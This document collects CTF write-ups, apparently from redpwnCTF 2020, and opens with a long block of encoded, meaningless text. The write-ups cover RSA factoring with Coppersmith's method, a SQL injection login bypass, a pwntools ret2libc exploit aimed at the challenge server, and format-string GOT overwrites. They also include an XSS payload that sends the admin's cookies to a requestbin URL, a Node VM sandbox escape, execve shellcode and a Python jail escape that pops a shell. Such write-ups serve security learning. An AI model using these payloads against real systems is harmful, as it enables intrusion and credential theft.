dHeFdZbXRhVjFsWGRFdGhSbGwzVjI1T2FtSkhVakZYYTFwclZHeGFjbU5HYkZkaGEydzBWV3BHV21WR1pIVlRhemxZVWpOb2IxWlhlR0ZrTWxKelYyNUdVbGRIYUZSVVYzTXhVakZzY2xkdE9WZE5WWEJYV1RCak5WZEdXbk5UYTNoV1lXdGFURmt5YzNoV01YQklZa1pPYUUwd1NqSldNVnBUVkRGRmVGcElUbGhpYkVweFZXeFNjMVV4VWxkWGEzUlVVbXh3TUZSc1ZtdFdNVWwzVjFSS1YySlVWbEJXYlRGTFYxZEdSbVZHVmxkaVNFSnZWbFJDVm1WR1pFWlBWbVJZWVhwV1ZGVnNXbk5OTVZsNFYyeGtXbFp0ZUZoV01XaHZWMFprU1ZGdE9WWmlWRVoyV1ZWYVYyTnNXblJTYlhCcFVteHdORlpYTURGaE1WVjNUVmhLV0dFeWVHaFdiRnAzVlVac2NscEZkRmhXTUZwSVdWVmFhMVJzV1hoU1dHUlhUVlp3YUZsNlJscGxSbFoxVTIxR1UySlhhRnBXVjNCUFlqSldWMWRzYUU1VFIyaFhWRlphYzA1R1dsaGxSemxvVFZVMVNWWlhlRzlXVmxwelkwaHdWV0pHY0ZSWmVrWmhaRWRTUjFwRk5WZGlhMGt5VmpGU1ExVXhSWGhYV0doWVYwaENiMVZ0ZUV0WFZscDBaVWhrV2xadVFsbFVWbFpyVmtaWmQyTkZiRlppV0doUVZsUkdZV1JGT1ZWWGJHUnBVakZGZDFZeFdtRlhiVlpYVm01S2FGSnJOVzlVVjNoTFlqRmFXR05GZEdsTlZrWTBWbGQ0WVZZeVNrbFJhemxXWWxob00xUlZXbmRXYkhCR1drWm9hVkp0ZDNwWFYzUlRWakZhZEZOcmFHaFRSbkJaVm0xNGQxUkdXWGRhUldSVFRWWndlbGt3V210Vk1XUkdVMnhhVjJKWVFraFhWbVJPWlZaV2NtRkdXbWhOYm1odlZsY3dlRlV4VVhoWGJrWlZZbFJzV1ZsclpGTmxWbHAwVFZSQ1ZrMUVSbmxXTW5SdlZtc3hjVlpzVWxwV1JWcE1WV3BHYTJSR1NuUlNiR1JPVFVSRk1GWXlkR3RPUm14WVZHeGtVMkpIZUc5VmJURnZWa1pzY2xkdVpFOVNiSEJZVjJ0U1UyRXdNWEpYYTJSVlZteHdlbFpYTVV0U2JHUnpZVVp3YUUxWVFrMVdhMVpoVmpKU1JrMVdaR0ZTTTBKUFZteG9RbVZHV25OYVJGSlNUVlpzTlZVeWVHdFdSMHBHVTJ4b1dtSkdTa05hVlZwWFZsWktkRkpzWkU1V01VbzJWMVpXYTJReFZYaGFSV1JVWWtkb1dWWnFUbTloUm1SWFYyMTBVMDFYVW5wWlZWVTFWakpLVjFOc2JGZGlXRUpFV2tSR1QxWXlTa2RYYkdocFlYcFdXVmRYZUZkWlYxWlhWMWhzYTFKR1NsbFpiRlpoWlZaWmVVMVhPVmROUkVaSlZsZDRiMVpyTVVkV1ZFWlhZV3RhY2xreWN6RlhSMFpJWlVkc1UySnJTbTlXYlRGM1VqSkZkMDFWYUZSWFIyaFhWakJrYjFkV1dYZGFSemxZVm0xNFZsVnROV3RYUmxwMFpVaHNWMDF1VVhkV2FrcExVakpPUlZGdFJsZFdNbWg1Vm0xMFlWTXlUWGhVYmxacFVtMVNUMWx0TVc1bGJHUllaRWRHV2xac2NGaFZNalZQVjBkS1IyTkdhR0ZXTTFKb1ZGZDRZV014Vm5Ka1JsSk9WbFJXV1ZaWE1UUmpNV3hYVTI1U1ZtSnJTbGRaVjNSaFUwWlNWVkp0ZEZoV01EVkhWMnRrYjFSc1dsVldhMnhYVmtWcmVGWnFSbUZUUmtweFYyMXNVMkpYYUZoWFYzUmhVekZrUjFkWWFGaGlXRkpZVkZab1ExSnNWbGhOVkVKVllrWndWbFp0ZEhOWFJscHpVMnhDV21WcmNFeFZha1pQWXpGYWRHSkdVbE5YUlVwWlZqRmFhMDFHVFhsU2EyUlhWMGRTV1ZsdGRIZGpiRkpYWVVWT1UySkdjRmxVVm1NMVZtc3hWMk5GWkZkTmFrWklWbXBHWVdSR1ZuRlViR1JvWVRGd2FGZHNXbUZVTWsxNVUydGtWR0pYYUU5V2JHaERXVlphZEUxSWFFOVNNVVkwVmpGb2IyRnNTblJWYkd4YVlURlZlRmt5ZUdGa1IxWkdaRVUxVTJKWVVYcFdha3A2VGxaWmQwMVZWbE5oYTBwaFZteGFkMkZHV25GUldHaFlVbXhhV2xkcldtdGhWbVJHVGtSQ1YyRnJTbWhXVkVwUFl6Sk9SbHBIYUZOTmJtaDNWbGQ0YjFFd05WZFhiazVXWVRBMWIxUldXbGRPUm1SeVZtMTBhRlpyTlVkWk1GcHpWMjFLV1ZSWWFGZFdWbkJZV2tWVmVGWXhVblJsUm1ScFUwVktZVll5ZEZkV2F6VlhXa1ZrVkZkSFVuRlZiR1J2V1Zac1ZWSnJkRmRTYkhBd1ZGWldNRmRHV25KWGJuQldWak5vY2xsV1drcGxSazV5VFZaa1YwMHdTazFXYTFKSFZERlplRlZ1VmxWaVZWcFVWbXRhWVZaV1drZFhiR1JyVFZaS2VsWXhhRzloUms1SVZXeFNWVlpzY0VoVWJGcGhVMFUxVm1SR1dsTmlTRUYzVm14amVHSXhXblJTYmtwcVUwWndXRlZyVm1GaFJuQkdWbFJHVjJKR1NucFdiVEZ6VlRKS2NsTlVRbGRpUjA0eldsVmFTbVZHY0VsVWJHaHBZa1Z3ZWxaWE1IaE9SbVJIVjI1R1ZXSkZOWEpaYTFwM1pVWlZlV1JIUm1sU2Eyd3pWR3hXYzFkc1dsZGpSMmhhVm14d1RGa3lNVTlTVm1SeldrZHNXRkpyY0haV01XaDNVekZSZVZWclpGUmlhM0JaV1d0YVMyTkdXWGRYYTNSV1VteHdNRmt3Vm10V1JURkZWbTV3VjAxcVZsUldSM2hQVTBkR1IxVnNWbGROTVVwdlZsZHdSMVV4V1hoYVNGSnJVakpvY0ZWc2FFSmtNV1J6Vm0xR2FFMVdjRmhXTW5CaFZqSktSMU50UmxkaVJuQXpXbGQ0V21ReGNFZGFSazVwVm10d1NWZFdWbUZVTVZKelYyNVdVbUV6VWxoWmEyUlBUa1pTY2xkc2NHeFNiVkphV1ZWYVUyRldTbk5qUm14WVZteEtTRmRXV210V01rcEpVMnhvYVdKV1NuWldWekUwWkRKV1IxWnVVbXRUUjFKd1ZXMTBkMlZXVW5OaFNHUlhUV3R3VmxWdE5YZFdNVnBHWTBWa1lWWlhVbEJWYWtwSFVqRndTR0pHYUZOaE0wSlhWbTE0WVdFeVZuSk5WbVJYWW1zMVUxbHJXbUZVTVZaeVZXdEtVRlZVTURrPQ

the xor process leeks info on the flag. we can get upper and lower bits of p and q. here is good resource

https://github.com/ubuntor/coppersmith-algorithm

• sage go brrr (turned out my X,Y vals were too high ; has to not be bigger than actual prime [we dont know this] but big enough to reduce computation time)

• get primes

• unxor the original

• get "r3ts.....th3_fl4g_1ts3lf!!!!}"

apply root (raise to power phi / 4 ) if its 1 its square (has more roots - x prevents this if multiplied in)

• retrieve bits

• "flag{y0u_f0und_m0re_th4n_s3c"

full flag

Flag:flag{y0u_f0und_m0re_th4n_s3cr3ts.....th3_fl4g_1ts3lf!!!!}

def coron(pol, X, Y, k=2, debug=False):
    """
    Returns all small roots of pol.
    Applies Coron's reformulation of Coppersmith's algorithm for finding small
    integer roots of bivariate polynomials modulo an integer.
    Args:
        pol: The polynomial to find small integer roots of.
        X: Upper limit on x.
        Y: Upper limit on y.
        k: Determines size of lattice. Increase if the algorithm fails.
        debug: Turn on for debug print stuff.
    Returns:
        A list of successfully found roots [(x0,y0), ...].
    Raises:
        ValueError: If pol is not bivariate
    """

    if pol.nvariables() != 2:
        raise ValueError("pol is not bivariate")

    P.<x,y> = PolynomialRing(ZZ)
    pol = pol(x,y)

    # Handle case where pol(0,0) == 0
    xoffset = 0

    while pol(xoffset,0) == 0:
        xoffset += 1

    pol = pol(x+xoffset,y)

    # Handle case where gcd(pol(0,0),X*Y) != 1
    while gcd(pol(0,0), X) != 1:
        X = next_prime(X, proof=False)

    while gcd(pol(0,0), Y) != 1:
        Y = next_prime(Y, proof=False)

    pol = P(pol/gcd(pol.coefficients())) # seems to be helpful
    p00 = pol(0,0)
    delta = max(pol.degree(x),pol.degree(y)) # maximum degree of any variable

    W = max(abs(i) for i in pol(x*X,y*Y).coefficients())
    u = W + ((1-W) % abs(p00))
    N = u*(X*Y)^k # modulus for polynomials

    # Construct polynomials
    p00inv = inverse_mod(p00,N)
    polq = P(sum((i*p00inv % N)*j for i,j in zip(pol.coefficients(),
                                                 pol.monomials())))
    polynomials = []
    for i in range(delta+k+1):
        for j in range(delta+k+1):
            if 0 <= i <= k and 0 <= j <= k:
                polynomials.append(polq * x^i * y^j * X^(k-i) * Y^(k-j))
            else:
                polynomials.append(x^i * y^j * N)

    # Make list of monomials for matrix indices
    monomials = []
    for i in polynomials:
        for j in i.monomials():
            if j not in monomials:
                monomials.append(j)
    monomials.sort()

    # Construct lattice spanned by polynomials with xX and yY
    L = matrix(ZZ,len(monomials))
    for i in range(len(monomials)):
        for j in range(len(monomials)):
            L[i,j] = polynomials[i](X*x,Y*y).monomial_coefficient(monomials[j])

    # makes lattice upper triangular
    # probably not needed, but it makes debug output pretty
    L = matrix(ZZ,sorted(L,reverse=True))

    if debug:
        print("Bitlengths of matrix elements (before reduction):")
        print(L.apply_map(lambda x: x.nbits()).str())

    L = L.LLL()

    if debug:
        print("Bitlengths of matrix elements (after reduction):")
        print(L.apply_map(lambda x: x.nbits()).str())

    roots = []

    for i in range(L.nrows()):
        if debug:
            print("Trying row %d" % i)

        # i'th row converted to polynomial dividing out X and Y
        pol2 = P(sum(map(mul, zip(L[i],monomials)))(x/X,y/Y))

        r = pol.resultant(pol2, y)

        if r.is_constant(): # not independent
            continue

        for x0, _ in r.univariate_polynomial().roots():
            if x0-xoffset in [i[0] for i in roots]:
                continue
            if debug:
                print("Potential x0:",x0)
            for y0, _ in pol(x0,y).univariate_polynomial().roots():
                if debug:
                    print("Potential y0:",y0)
                if (x0-xoffset,y0) not in roots and pol(x0,y0) == 0:
                    roots.append((x0-xoffset,y0))
    return roots

size = 1024
low = 496
mid = 400
high = 128


X = Y = 2**(mid-1)

n = 15208002172852064705513549049156125156229213752159018163825621612365155017442357321243997240694068589814280403280924059115680689958405528673283969584726875025903837971544565855345730100919461985993701827484692130096087415066915297046298354141978649627535608324891962634115164448150854962245168416609362554295547467846154568712738134639516660184864893586000423886731114509172379025554849606702807764604046562890333894888196970691461892191718079065215120535321387122435702257687877333759869565354852332910433540118176537491958544695956496612702255403127864825597702515541366203734967406176296928067151309367243599261047

c0 = int("c24b08080224327e3e5c92c9fc01a796",16)
c2 = int("28c7b802e5fd4ed05138cc51adb622bdd2c5eaa3676bc1f4f6fd6f95df7306d33ad44f89d46edc0ae0d2615a4b96ff6a57b6e01bdc1ff0ba7b17690721a1",16)

d0 = int("9ebb4f84833afa3fa4145957bfcaf50b",16)
d2 = int("9968f62b5af28332134fbd88a52db031d4573353acff68f800dfea6a4b97d1f5ca9d999aac7954df3bdf268b216cadf6a9198340ce404e075fef05772817",16)

P.<x,y> = PolynomialRing(ZZ)
pol = ((c0 * (2**(mid+low))) + c2 + (x * (2**low)))*((d0 * (2**(mid+low))) + d2 + (y * (2**low))) - n
print("pol generated")
res = coron(pol, X, Y)
print("ok should give output")
if len(res) > 0:
    p = (c0 * 2**(mid+low) + c2 + res[0][0] * 2**low)
    q = (d0 * 2**(mid+low) + d2 + res[0][1] * 2**low)
    #print(res)
    print('%d, %d' % (p,q))

print(res)

Script for doing this

Script to get the output:

def coron(pol, X, Y, k=2, debug=False):
    """
    Returns all small roots of pol.
    Applies Coron's reformulation of Coppersmith's algorithm for finding small
    integer roots of bivariate polynomials modulo an integer.
    Args:
        pol: The polynomial to find small integer roots of.
        X: Upper limit on x.
        Y: Upper limit on y.
        k: Determines size of lattice. Increase if the algorithm fails.
        debug: Turn on for debug print stuff.
    Returns:
        A list of successfully found roots [(x0,y0), ...].
    Raises:
        ValueError: If pol is not bivariate
    """

    if pol.nvariables() != 2:
        raise ValueError("pol is not bivariate")

    P.<x,y> = PolynomialRing(ZZ)
    pol = pol(x,y)

    # Handle case where pol(0,0) == 0
    xoffset = 0

    while pol(xoffset,0) == 0:
        xoffset += 1

    pol = pol(x+xoffset,y)

    # Handle case where gcd(pol(0,0),X*Y) != 1
    while gcd(pol(0,0), X) != 1:
        X = next_prime(X, proof=False)

    while gcd(pol(0,0), Y) != 1:
        Y = next_prime(Y, proof=False)

    pol = P(pol/gcd(pol.coefficients())) # seems to be helpful
    p00 = pol(0,0)
    delta = max(pol.degree(x),pol.degree(y)) # maximum degree of any variable

    W = max(abs(i) for i in pol(x*X,y*Y).coefficients())
    u = W + ((1-W) % abs(p00))
    N = u*(X*Y)^k # modulus for polynomials

    # Construct polynomials
    p00inv = inverse_mod(p00,N)
    polq = P(sum((i*p00inv % N)*j for i,j in zip(pol.coefficients(),
                                                 pol.monomials())))
    polynomials = []
    for i in range(delta+k+1):
        for j in range(delta+k+1):
            if 0 <= i <= k and 0 <= j <= k:
                polynomials.append(polq * x^i * y^j * X^(k-i) * Y^(k-j))
            else:
                polynomials.append(x^i * y^j * N)

    # Make list of monomials for matrix indices
    monomials = []
    for i in polynomials:
        for j in i.monomials():
            if j not in monomials:
                monomials.append(j)
    monomials.sort()

    # Construct lattice spanned by polynomials with xX and yY
    L = matrix(ZZ,len(monomials))
    for i in range(len(monomials)):
        for j in range(len(monomials)):
            L[i,j] = polynomials[i](X*x,Y*y).monomial_coefficient(monomials[j])

    # makes lattice upper triangular
    # probably not needed, but it makes debug output pretty
    L = matrix(ZZ,sorted(L,reverse=True))

    if debug:
        print("Bitlengths of matrix elements (before reduction):")
        print(L.apply_map(lambda x: x.nbits()).str())

    L = L.LLL()

    if debug:
        print("Bitlengths of matrix elements (after reduction):")
        print(L.apply_map(lambda x: x.nbits()).str())

    roots = []

    for i in range(L.nrows()):
        if debug:
            print("Trying row %d" % i)

        # i'th row converted to polynomial dividing out X and Y
        pol2 = P(sum(map(mul, zip(L[i],monomials)))(x/X,y/Y))

        r = pol.resultant(pol2, y)

        if r.is_constant(): # not independent
            continue

        for x0, _ in r.univariate_polynomial().roots():
            if x0-xoffset in [i[0] for i in roots]:
                continue
            if debug:
                print("Potential x0:",x0)
            for y0, _ in pol(x0,y).univariate_polynomial().roots():
                if debug:
                    print("Potential y0:",y0)
                if (x0-xoffset,y0) not in roots and pol(x0,y0) == 0:
                    roots.append((x0-xoffset,y0))
    return roots

size = 1024
low = 496
mid = 400
high = 128


X = Y = 2**(mid-1)

n = 15208002172852064705513549049156125156229213752159018163825621612365155017442357321243997240694068589814280403280924059115680689958405528673283969584726875025903837971544565855345730100919461985993701827484692130096087415066915297046298354141978649627535608324891962634115164448150854962245168416609362554295547467846154568712738134639516660184864893586000423886731114509172379025554849606702807764604046562890333894888196970691461892191718079065215120535321387122435702257687877333759869565354852332910433540118176537491958544695956496612702255403127864825597702515541366203734967406176296928067151309367243599261047

c0 = int("c24b08080224327e3e5c92c9fc01a796",16)
c2 = int("28c7b802e5fd4ed05138cc51adb622bdd2c5eaa3676bc1f4f6fd6f95df7306d33ad44f89d46edc0ae0d2615a4b96ff6a57b6e01bdc1ff0ba7b17690721a1",16)

d0 = int("9ebb4f84833afa3fa4145957bfcaf50b",16)
d2 = int("9968f62b5af28332134fbd88a52db031d4573353acff68f800dfea6a4b97d1f5ca9d999aac7954df3bdf268b216cadf6a9198340ce404e075fef05772817",16)

P.<x,y> = PolynomialRing(ZZ)
pol = ((c0 * (2**(mid+low))) + c2 + (x * (2**low)))*((d0 * (2**(mid+low))) + d2 + (y * (2**low))) - n
print("pol generated")
res = coron(pol, X, Y)
print("ok should give output")
if len(res) > 0:
    p = (c0 * 2**(mid+low) + c2 + res[0][0] * 2**low)
    q = (d0 * 2**(mid+low) + d2 + res[0][1] * 2**low)
    #print(res)
    print('%d, %d' % (p,q))

print(res)

Inspect element, the flag will be in the <head>

Flag: flag{1nspector_g3n3ral_at_w0rk}

Basic SQL injection:

aaa' OR 1=1 --]

in both fields.

Flag: flag{0bl1g4t0ry_5ql1}

so uh reconstruct the pub key info asn1 by hand (or use a converter)

30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 
00 03 82 01 0f
 00 30 82 01 0a
 02 82 01 01 

 00 b9 f7 ee 5a 16 2b a5 35 bc 71 d7 00 59 4c 1e 4f ca 19 60 2a 7f f2 92 8f 62 3e 1e 67 7a 5d ee 68 58 a0 29 12 49 ea 99 e5 ef 8b df 73 b7 f1 2a 0c 00 da 20 33 53 41 6b 26 25 ba 63 9c 3f 10 bf 0b d3 c7 30 5e 80 95 a2 c3 1f ec 97 fc 58 3e 6b 4e 79 9b 43 bb fb 9a 49 35 45 6e 46 7f 73 ed a6 21 86 e6 e7 47 28 e4 d9 c5 53 1c b9 8e 1e a2 bd 14 f3 35 40 10 5d a2 e7 5d 32 06 58 13 aa 65 68 17 41 20 cc 10 f2 dc 6e 65 0b 3a b7 ce b6 cc 97 c0 d3 f7 20 4f 8e d3 b6 24 cd 92 8b 87 90 0b 93 55 70 4f 71 b3 39 a5 72 2e ec ca 1f 94 9a d4 8d 0d 25 8e e3 88 16 05 d0 ef 00 85 ba c5 eb 22 9b ee 56 9a 8b cd 1b d3 0f af 46 03 b0 a3 d0 3b 7d 8a 3e ca 3e b0 45 33 68 c5 c9 1f 2f 9e 6e 70 f9 3e ac 19 a7 d7 80 91 04 8f 4b 0b 99 b2 11 79 67 0d 7b 21 c2 d9 39 7d 3a 78 b2 30 4a 8f 78 bb 19 a1

 02 03 01 00 01

create sha2 hash and then do look up on cert.sh

get common name

oa4gio7glypwggb9iu3rh8mrc87tnjbs.flag.ga

Flag: flag{c3rTific4t3_7r4n5pArAncY_fTw}

So, from the name and desc, as well as the fact you're provided with the libc binary, we know this is a ret2libc right off the bat. Inspecting the source code, we can see the read function is called into a 16-byte array, reading 0x100 bytes from stdin. This opens up a lot of room for overflow.

The array is stored at rbp-0x10, leaving 24 bytes of padding until our ROP chain.

We can use ret2plt to leak a libc address by calling the libc function puts via the PLT on the puts entry in the GOT, effectively printing a libc address back to ourselves. This works because there's no PIE in the binary, so the GOT and the PLT are stable.

So, we can first send padding + poprdi + puts@got + puts@plt + main so that the program calls puts on puts@got, sending us a libc address, and then rets back into main so we can get another input. On this second input, now that we know exactly where the libc is and have defeated ASLR, we send padding + poprdi + /bin/sh address + ret gadget + system address. This forces the program to call system("/bin/sh"), popping a shell for us. The ret gadget is needed to fix stack alignment.

from pwn import *
import sys 
mode = sys.argv[1]
NUM_TO_RET = 0x10 + 8
padding = b'A' * NUM_TO_RET
poprdi = 0x0000000000400733 # pop rdi ; ret
retgadget = 0x0000000000400506 # ret
e = ELF("./library")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6" if mode == 'local' else './libc.so.6')
p = e.process() if mode == 'local' else remote('2020.redpwnc.tf', 31350)
p.recvline()
leak = flat(padding, poprdi, e.got['puts'], e.plt['puts'], e.symbols['main'], word_size=64)
p.sendline(leak)
p.recvlines(2)
output = p.recvline()[:-1] + b'\x00\x00'
puts = u64(output)
log.info(f"Puts address leak:  {hex(puts)}")
libcbase = puts - libc.symbols['puts']
libc.address = libcbase
log.info(f"Libc base: {hex(libcbase)}")
p.recvline()
final = flat(padding,poprdi,next(libc.search(b"/bin/sh\x00")),retgadget,libc.symbols['system'],word_size=64)
p.sendline(final)
p.interactive()

We can tell the name is a clear reference to a SAT-solver. Running the program, it asks for a flag, then tells us whether it's correct or incorrect.

Opening it up in ghidra, we see a lot goes on. Specifically, it does A LOT of checks. It reads your input onto the stack, and does many checks against the characters. Every check is of the form

characterofinput < othercharacterofinput

If any of these checks are true, it tells us the flag is incorrect. If none of these are satisfied, it goes ahead and checks that all of the chars are alphanumeric. If not, it tells us the flag is incorrect. If all these checks pass, it tells us the flag is correct.

Clearly, the way to go here is to use a sat solver to figure out what possibilities fit all of the checks. I used the Z3 python API.

I ran some simple parses on the input to create a Solver object, and then extracted the model. Note: the chall desc says all letters are lowercase, and we know the flag regex, so this allows us to significantly reduce the range.

My full script is uploaded below.

For some reason, it thinks the last char is | not }, but that doesn't matter and is easily fixable.

Flag: flag{thequickbrownfoxjumpedoverthelazydogandlearnedhowtoautomateanalysis}

So first things first, create a pastebin. When you go to the display, you'll see a url like

That looks kinda like base64, and if you base64 decode the thing after you'll find it decodes to the content of the pastebin! This allows us to easily create pastebin messages.

There's also an admin bot submit form, where we can submit a url, and the admin bot will visit it.

Rak found that the xss ><img src='' onerror="javascript code"> worked.

First, we can try a simple redirect. ><img src='' onerror="document.location='requestbinurl'">. I set up a requestbin for this purpose. Remember: we base64 encode the payload, and append it to the major part of the url.

, as a sample, works, sending a request to our requestbin. Let's exfiltrate some information. We can use GET parameters to exfiltrate data.

><img src='' onerror='document.location="http://requestbin.net/r/1lfrfyi1?thing=" + document.cookie'>

This would redirect the admin to our requestbin, sending the cookies as the "thing" parameter. Base64 encoding and submitting this as a url, a request on the requestbin pops up with the parameters ?thing=flag=flag{54n1t1z4t10n_k1nd4_h4rd}, giving us the flag,

flag{54n1t1z4t10n_k1nd4_h4rd}

From the desc we know it's a format string. There's no symbol for main, so i opened it up in radare2.

It opens mallocs a heap address, stores it on the stack, opens flag.txt, and reads it to that heap address. We can use the format specifier %s to read the flag by referencing this heap address.

I didn't bother actually calculating the offset and just bruteforced it.

Coffer Overflow 0

Read source, there's a code var.

It's set to 0. At the end, if it's not 0, a shell is popped.

Pretty simple chall, just spam chars and a shell pops, cat flag.txt

Coffer Overflow 1

Same thing, except code must be 0xcafebabe.

Let's disassemble main, we'll find the difference between our input(rbp-0x20) and the var(rbp-0x8) is 24 bytes, so send 24 bytes + p64(0xcafebabe)

Coffer Overflow 2

ret2win exploit. There's a function called binFunction.

Our input is at rbp-0x10, so 0x10 + 8 bytes until return address.

Overwrite return address with address of binFunction, which pops a shell.

There's a lot of unnecessary bloat that I'll mostly ignore.

Cracking open the binary in ghidra, we see that the first input we get is actually a scanf, scanning a decimal integer into a variable. It then checks this integer against 1. If the integer isn't 1, it pops a shell - zsh. Nothing happens remotely, likely they do not have zsh. So that's not very useful.

What happens if the integer is 1? It continues with the rest of the execution of the program. The program opens up a never-ending prompt in which it asks for an input. If the input is the same as notflag{a_cloud_is_just_someone_elses_computer}\n when strcmp-ed,the program tells us we did it and rets. This will be useful later on to deliver our final exploit.

In the prompt, 0x200 bytes are read into rbp-0x90, creating a clear buffer overflow vulnerability.

Sadly, however, every protection is on. Canary, RELRO, PIE and most likely ASLR. We're going to need to leak somehow.. but how?

The read function does not null terminate. That means our input will not be null terminated as a string unless we enter a null byte. Not only this, but the program calls printf("%s??", input), printing the input back to us. Printf will only know the end of a string once it hits a null byte, meaning we can leak values off of the stack!

For example, say this was the stack

00 00 00 00 00 00 00 00 00 \

we could write like so

41 41 41 41 41 41 41 41 0a \

now, when it prints, it'll keep printing, leaking the canary and saved RBP .fini address.

NOTE: Canaries start with null bytes! We will have to overflow one byte of the canary so that we can read the rest. It doesn't matter that we overflow the canary until we make the program ret, but by then we will know what the full canary is and be able to replace it.

We can use this again to leak the saved ret address, which will be __libc_start_main_ret.

Once all these values are leaked, we send the finished exploit. notflag{a_cloud_is_just_someone_elses_computer}\n\x00 + padding + canary + more padding + poprdi + /bin/sh address + retgadget + systemaddress

NOTE: We can leak the binary base through the .fini address. We don't strictly need it here, as libc has ROP gadgets, but it's useful.

First things first: let's run checksec. There's Partial RELRO, and no PIE. This opens a bundle of attacks, but for now let's not comment on that.

Running the program, we get one input. Spamming lots of chars, we get a stack smashing error. That means a canary.

Opening it up in radare2, we can inspect the "hidden" main function. We see it reads 0x120 bytes into rbp-0x110. Buffer overflow? Kinda, but I didn't use it except to trigger a canary mismatch.

Most importantly, it calls printf on our input directly, opening a range of format string attacks. The first thing that pops into mind is a format string overwrite, but what to overwrite? The only libc function called after our input is printf-ed is __stack_chk_fail, but that's only called if there's a canary mismatch.

Our goal? Overwrite __stack_chk_fail@GOT with the address of main, then trigger a canary mismatch. Everytime the canary mismatches, it'll try to call stack chk fail, but instead it'll just call main again. This gives us infinite calls of main, so we can do whatever we want with format strings including writing and reading before we deliver the final exploit.

I cut my exploit in 4 stages.

• Stage 1: Overwrite __stack_chk_fail@got with the address of main. Trigger canary mismatch, main will call again

• Stage 2: Leak __libc_start_main_ret using %77%lp. Make sure to trigger canary mismatch in order to call main again

• Stage 3: Calculate libc base. Overwrite printf@GOT with system@libc. Trigger canary mismatch for the final time.

• Stage 4: Enter /bin/sh. The program will attempt to call printf("/bin/sh"), actually calling system("/bin/sh"), popping a shell.

Note: remotely, for some reason, the shell is really unstable? After one command it breaks and disconnects. Still some form of temporary shell though, enough to cat flag.txt.

Just strings it, you'll get:

Give me a magic number:

First part is: flag{r0pes_ar3_

Second part is: just_l0ng_str1ngs}

Two parts of the flag, concatenate to get:

flag{r0pes_ar3_just_l0ng_str1ngs}

replace eval with echo perform echo on main string

flag{us3_zsh,_dummy}

Sandboxed NodeJS environment

We figured out we could use this.constructor.constructor("return this.process")() to run more arbritrary JS, but the require function was disabled.

However, we could use this.process.bindings to import the original C++ functions. With some reference to https://gist.github.com/phra/51f73898df729789aff741c6ea91d294 and the node JS source code, I came up with:

this.constructor.constructor("b = Buffer.allocUnsafe(8192);this.process.binding('fs').read(this.process.binding('fs').open('/ctf/flag.txt', 0, 0600, 0, 0), b, 0, 4096, 0, 0, 0); return b")().toString()

• Define a buffer of size 8192

• Call read() on a file descriptor provided by open('/ctf/flag.txt') in readonly, and read that into the buffer, then return

The zeros are where the docs specified 'undefined' and 'ctf' and luckily this didn't matter. We get the flag(and a bunch of junk)

Flag:flag{vm_1snt_s4f3_4ft3r_41l_29ka5sqD}

We're given a python file which writes some data to a file then extacts a python program from b64 and runs it. After a lot of analysis and removing unicode chars,

I realised it's a VM interpreter.

Doing some more reversing of the program showed me it was a simple Brainfuck interpreter, with > < - + and ? (nop).

There's also a function (unused) to essentially execute shellcode.

The problem was then to simply overwrite the instruction for the 'nop' to the shellcode instruction,

and write shellcode in using brainfuck to modify the existing stack.

sc = b"\x90\x90\x6A\x42\x58\xFE\xC4\x48\x99\x52\x48\xBF\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x57\x54\x5E\x49\x89\xD0\x49\x89\xD2\x0F\x05"
actual_nums = [5, 0, 1, 0, 138, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 104, 116, 116, 112, 115, 58, 47, 47, 97, 97, 114, 111, 110, 101, 115, 97, 117, 46, 99, 111, 109, 47, 102, 105, 108, 101, 115, 47]
goal_nums = [0x25]
goal_nums.extend(list(sc))
print(list(zip(actual_nums,goal_nums)))
print('<'*(1469-1398),end='')
for a,g in zip(actual_nums,goal_nums):
    if a < g:
        print('+'*(g-a),end='')
    if a > g:
        print('-'*(a-g),end='')
    print('>',end='')

flag{b1ng0!_obl1g4t0ry-sh1tty-cust0m_4rch_ch4l-ftw}

Our array is {0x1, 0xa, 0x3, 0x2, 0x5, 0x9, 0x8, 0x7, 0x4, 0x6}

And every number we enter swaps arr[i] with arr[i+1]

https://www.hackerearth.com/practice/algorithms/sorting/bubble-sort/visualize/ went brrr and I got the swaps

1
2
3
4
5
6
7
8
1
4
5
6
7
4
5
6
4
5
3
10

(10 causes it to check the array)

Flag:flag{4ft3r_y0u_put_u54c0_0n_y0ur_c011ege_4pp5_y0u_5t1ll_h4ve_t0_d0_th15_57uff}

A very tough Pyjail + Golf challenge.

Builtins are removed, meaning no top level functions, we're run inside eval, which means no assignments, all letters are blacklisted, as well as quotes and spaces.

The limit for the challenge was set at 102 chars. First, the letter blacklist. This was definitely the easiest, and we just had to use a 'fancy text generator', as Python appears to 'collapse' this text to regular ASCII before the length check but after the blacklist. Our initial method involved traversing the namespace twice, to reach open() and the string 'flag.txt'.

This was over 200 chars, and didn't work due to Python not loading in the function correctly.

We realised we would have to pop a shell.

Traversing to system took us 120 chars, and that was without a string such as sh to run it with.

After a while, I spotted an os function earlier in the tree, and could use that to traverse to the os namespace, calling system from there. After that, it was a simple matter of getting any class, and substringing its hash method to get 'sh'.

().__class__ - <class 'tuple'>
().__class__.__base__ - <class 'object'>
().__class__.__base__.__subclasses__()[127] - <class 'os._wrap_close'>
().__class__.__base__.__subclasses__()[127].close - <function _wrap_close.close at 0x7f74eb2eca70>
[*().__class__.__base__.__subclasses__()[127].close.__globals__.values()][42] - <built-in function system>
().__dir__()[1] - '__hash__'
().__dir__()[1][4:6] - 'sh'
[*().__class__.__base__.__subclasses__()[-5].close.__globals__.values()][42](().__dir__()[1][4:6]) - system('sh')

flag{SH*TI_h0pe_ur_n0t_b1c..._if_y0u@r3,_th1$_isn't_th3_fl@g}